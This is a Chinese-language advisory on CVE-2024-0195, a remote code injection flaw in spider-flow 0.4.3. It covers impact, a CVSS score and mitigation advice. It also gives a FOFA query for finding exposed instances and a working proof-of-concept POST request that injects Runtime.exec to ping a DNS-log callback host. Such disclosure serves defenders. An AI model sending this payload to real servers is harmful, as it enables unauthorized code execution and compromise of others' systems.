CVE-2024-0195 是 spider-flow 0.4.3 Web 应用程序中的一个严重代码注入漏洞,具体位于 FunctionController.java 文件的 FunctionService.saveFunction 函数中。攻击者可以远程注入恶意代码并在服务器上执行,从而导致应用程序完全沦陷。
此漏洞极为严重,因为它允许在托管易受攻击的 spider-flow 应用程序的服务器上执行远程代码。攻击者可以完全控制服务器、窃取敏感数据、安装恶意软件或挖矿程序,并利用它进一步攻击网络内部。应用程序和服务器的机密性、完整性和可用性均受到严重影响。
未明确提及已打补丁的版本,因此目前似乎没有可用的补丁。该漏洞已公开披露,且已有利用代码,因此立即采取缓解措施至关重要。
在官方发布补丁之前,应立即将 spider-flow 0.4.3 下线,或仅限制受信任的网络/用户访问。作为临时缓解措施,可以配置 Web 应用防火墙或其他输入验证控制来检测并阻止尝试的代码注入攻击。但这些并非完整解决方案,一旦有修复版本发布,应立即升级易受攻击的版本。
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
FOFA : app="spiderflow"
✔ 概念验证
POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139
id=&name=test¶meter=test&script=return+java.lang.%2F%2A%2A%2A%2A%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B